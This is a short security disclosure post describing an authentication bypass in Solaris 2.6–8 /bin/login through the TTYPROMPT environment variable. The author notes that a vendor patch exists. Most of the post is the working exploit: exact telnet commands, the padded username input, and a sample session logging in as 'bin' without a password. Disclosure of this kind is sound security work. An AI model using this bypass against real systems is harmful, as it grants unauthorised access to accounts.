solaris.login.txt

`Hello,  
  
Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the  
environment variable TTYPROMPT. This vulnerability has already been  
reported to BugTraq and a patch has been released by Sun.  
However, a very simple exploit, which does not require any code to be  
compiled by an attacker, exists. The exploit requires the attacker to  
simply define the environment variable TTYPROMPT to a 6 character string,  
inside telnet. I believe this overflows an integer inside login, which  
specifies whether or not the user has been authenticated (just a guess).  
Once connected to the remote host, you must type the username, followed by  
64 " c"s, and a literal "\n". You will then be logged in as the user  
without any password authentication. This should work with any account  
except root (unless remote root login is allowed).  
  
Example:  
  
coma% telnet  
telnet> environ define TTYPROMPT abcdef  
telnet> o localhost  
  
SunOS 5.8  
  
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c  
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n  
Last login: whenever  
$ whoami  
bin  
  
Jonathan Stuart  
Network Security Engineer  
Computer Consulting Partners, Ltd.  
E-mail: [email protected]   
`